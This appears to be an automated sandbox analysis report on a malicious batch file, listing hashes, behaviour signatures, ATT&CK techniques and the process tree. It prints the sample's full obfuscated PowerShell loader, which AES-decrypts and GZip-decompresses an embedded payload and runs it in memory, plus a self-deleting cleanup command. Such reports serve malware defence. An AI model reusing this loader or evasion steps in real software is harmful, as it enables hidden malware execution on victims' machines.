76fc358fa8b3b845ac771bd4dd0746bb49f537ebcf61737e9ee4e5582fdd133a

General

Target

xxicqf.bat
Size

325KB
MD5

4f3c7ff71a35d8abaf90dd0f2353b621
SHA1

b42e3e4ea9ff13c978d1b614f06f2d86735e495d
SHA256

76fc358fa8b3b845ac771bd4dd0746bb49f537ebcf61737e9ee4e5582fdd133a
SHA512

a81106eea5988266fe759d22393b3b5f745c4e27db367ba930913c29c5afe03cac374112c1ec312c2f267d8477eab1e8f2bdf709c28b0a3ef0f90f762cdc982f
SSDEEP

6144:sb0ERTjCC/oq28xqqHBykjjIxEfTKyRfFysWiS3IzZK/DPcAW:sbXjCC/oX8x3HBykjMxsmyRf1UaKTcAW

Score

8^/10

Malware Config

Signatures

Executes dropped EXE 1 IoCs

Processes:

xxicqf.bat.exe

pid process

628 xxicqf.bat.exe

pid	process
628	xxicqf.bat.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

xxicqf.bat.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	xxicqf.bat.exe

Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

17 api.ipify.org
18 api.ipify.org
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

flow	ioc
17	api.ipify.org
18	api.ipify.org

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

wermgr.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	wermgr.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	wermgr.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

wermgr.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	wermgr.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

3704 PING.EXE
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

xxicqf.bat.exe

pid process

628 xxicqf.bat.exe
628 xxicqf.bat.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

xxicqf.bat.exe

description pid process

Token: SeDebugPrivilege 628 xxicqf.bat.exe
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

xxicqf.bat.exe

pid process

628 xxicqf.bat.exe

pid	process
3704	PING.EXE

pid	process
628	xxicqf.bat.exe
628	xxicqf.bat.exe

description	pid	process
Token: SeDebugPrivilege	628	xxicqf.bat.exe

pid	process
628	xxicqf.bat.exe

Suspicious use of WriteProcessMemory 16 IoCs

Processes:

cmd.exexxicqf.bat.execmd.execmd.exe

description	pid	process	target process
PID 4324 wrote to memory of 628	4324	cmd.exe	xxicqf.bat.exe
PID 4324 wrote to memory of 628	4324	cmd.exe	xxicqf.bat.exe
PID 628 wrote to memory of 4340	628	xxicqf.bat.exe	cmd.exe
PID 628 wrote to memory of 4340	628	xxicqf.bat.exe	cmd.exe
PID 628 wrote to memory of 212	628	xxicqf.bat.exe	cmd.exe
PID 628 wrote to memory of 212	628	xxicqf.bat.exe	cmd.exe
PID 628 wrote to memory of 484	628	xxicqf.bat.exe	wermgr.exe
PID 628 wrote to memory of 484	628	xxicqf.bat.exe	wermgr.exe
PID 4340 wrote to memory of 4588	4340	cmd.exe	chcp.com
PID 4340 wrote to memory of 4588	4340	cmd.exe	chcp.com
PID 212 wrote to memory of 4468	212	cmd.exe	choice.exe
PID 212 wrote to memory of 4468	212	cmd.exe	choice.exe
PID 4340 wrote to memory of 3704	4340	cmd.exe	PING.EXE
PID 4340 wrote to memory of 3704	4340	cmd.exe	PING.EXE
PID 212 wrote to memory of 2344	212	cmd.exe	attrib.exe
PID 212 wrote to memory of 2344	212	cmd.exe	attrib.exe

Views/modifies file attributes 1 TTPs 1 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exe

pid process

2344 attrib.exe

pid	process
2344	attrib.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\xxicqf.bat"
- Suspicious use of WriteProcessMemory
PID:4324

C:\Users\Admin\AppData\Local\Temp\xxicqf.bat.exe
"xxicqf.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $TaxYb = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\xxicqf.bat').Split([Environment]::NewLine);foreach ($SdoSn in $TaxYb) { if ($SdoSn.StartsWith(':: ')) { $NuzKW = $SdoSn.Substring(3); break; }; };$OHzNm = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($NuzKW);$BecaB = New-Object System.Security.Cryptography.AesManaged;$BecaB.Mode = [System.Security.Cryptography.CipherMode]::CBC;$BecaB.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$BecaB.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0LL9z94yl5wYGOKSb2hreL71eR6/82H+3uxqNqN5hfA=');$BecaB.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('R3CRmi+qFKdZMzOHEfmfcA==');$EBkLd = $BecaB.CreateDecryptor();$OHzNm = $EBkLd.TransformFinalBlock($OHzNm, 0, $OHzNm.Length);$EBkLd.Dispose();$BecaB.Dispose();$bbcNa = New-Object System.IO.MemoryStream(, $OHzNm);$HkQNi = New-Object System.IO.MemoryStream;$phbxT = New-Object System.IO.Compression.GZipStream($bbcNa, [IO.Compression.CompressionMode]::Decompress);$phbxT.CopyTo($HkQNi);$phbxT.Dispose();$bbcNa.Dispose();$HkQNi.Dispose();$OHzNm = $HkQNi.ToArray();$ZnJXZ = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($OHzNm);$YEeli = $ZnJXZ.EntryPoint;$YEeli.Invoke($null, (, [string[]] ('')))
- Executes dropped EXE
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:628

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\24hThCDJcd5N.bat" "
- Suspicious use of WriteProcessMemory
PID:4340

C:\Windows\system32\chcp.com
chcp 65001
PID:4588

C:\Windows\system32\PING.EXE
ping -n 10 localhost
- Runs ping.exe
PID:3704

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c choice /c y /n /d y /t 1 & attrib -h -s "C:\Users\Admin\AppData\Local\Temp\xxicqf.bat.exe" & del "C:\Users\Admin\AppData\Local\Temp\xxicqf.bat.exe"
- Suspicious use of WriteProcessMemory
PID:212

C:\Windows\system32\choice.exe
choice /c y /n /d y /t 1
PID:4468

C:\Windows\system32\attrib.exe
attrib -h -s "C:\Users\Admin\AppData\Local\Temp\xxicqf.bat.exe"
- Views/modifies file attributes
PID:2344

C:\Windows\system32\wermgr.exe
"C:\Windows\system32\wermgr.exe" "-outproc" "0" "628" "3628" "3532" "2904" "0" "0" "2144" "0" "0" "0" "0" "0"
- Checks processor information in registry
- Enumerates system info in registry
PID:484

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Hidden Files and Directories

1

T1158

Privilege Escalation

Defense Evasion

Hidden Files and Directories

1

T1158

Credential Access

Discovery

Query Registry

3

T1012

System Information Discovery

4

T1082

Remote System Discovery

1

T1018

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\24hThCDJcd5N.bat
Filesize
211B

MD5
39f88ba1ed3e90cab71806a54bd40c7a

SHA1
75726c444f4630a5a3a046955e41d2bee4f3751f

SHA256
db29147a00ef147848ea12573b88d772cdfdcee0758c1a14f87d105da7b983aa

SHA512
31141a2827f1a9572f6dc9e64be1b11587b5fad732c778018e37a15526a9911ae8f20e7f0b494d62cd200fcbed8784ea1e4249e371b5c094dab88b084334efca

Download Submit
C:\Users\Admin\AppData\Local\Temp\xxicqf.bat.exe
Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Users\Admin\AppData\Local\Temp\xxicqf.bat.exe
Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
memory/212-142-0x0000000000000000-mapping.dmp

Download
memory/484-143-0x0000000000000000-mapping.dmp

Download
memory/628-132-0x0000000000000000-mapping.dmp

Download
memory/628-138-0x000002D8AE780000-0x000002D8AE832000-memory.dmp

Filesize
712KB

Download
memory/628-139-0x000002D8AEDA0000-0x000002D8AEF62000-memory.dmp

Filesize
1MB

Download
memory/628-140-0x00007FFC48150000-0x00007FFC48C11000-memory.dmp

Filesize
10MB

Download
memory/628-137-0x000002D8AE670000-0x000002D8AE6C0000-memory.dmp

Filesize
320KB

Download
memory/628-134-0x000002D8AE1B0000-0x000002D8AE1D2000-memory.dmp

Filesize
136KB

Download
memory/628-135-0x00007FFC48150000-0x00007FFC48C11000-memory.dmp

Filesize
10MB

Download
memory/628-148-0x00007FFC48150000-0x00007FFC48C11000-memory.dmp

Filesize
10MB

Download
memory/2344-149-0x0000000000000000-mapping.dmp

Download
memory/3704-147-0x0000000000000000-mapping.dmp

Download
memory/4340-141-0x0000000000000000-mapping.dmp

Download
memory/4468-146-0x0000000000000000-mapping.dmp

Download
memory/4588-145-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads